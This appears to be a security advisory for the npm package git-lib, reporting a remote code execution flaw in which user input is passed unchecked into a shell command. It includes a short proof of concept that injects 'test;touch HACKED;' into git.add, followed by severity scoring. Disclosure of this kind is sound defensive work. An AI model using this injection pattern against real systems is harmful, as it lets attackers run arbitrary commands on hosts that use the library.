Remote Code Execution (RCE)

Affecting git-lib package, ALL versions

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

git-lib is an a library with different git commands for uses.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). A user input is formatted inside a command that will be executed without any check.

PoC by mik317

  • Create the following PoC file:
// poc.js
var git = require("git-lib");

git.add("test;touch HACKED;").then(function(){
    /** successfully added **/
}).catch(function(err){
    /** unsuccessful **/
});
  • Check there aren't files called HACKED
  • Execute the following commands in another terminal:
npm i git-lib # Install affected module
git init # Avoid problems with *git*
node poc.js #  Run the PoC

CVSS Score

6.4
medium severity
  • Attack Vector
    Local
  • Attack Complexity
    High
  • Privileges Required
    High
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P/RC:C
Credit
mik317
CWE
CWE-94
Snyk ID
SNYK-JS-GITLIB-1012734
Disclosed
24 Sep, 2020
Published
25 Sep, 2020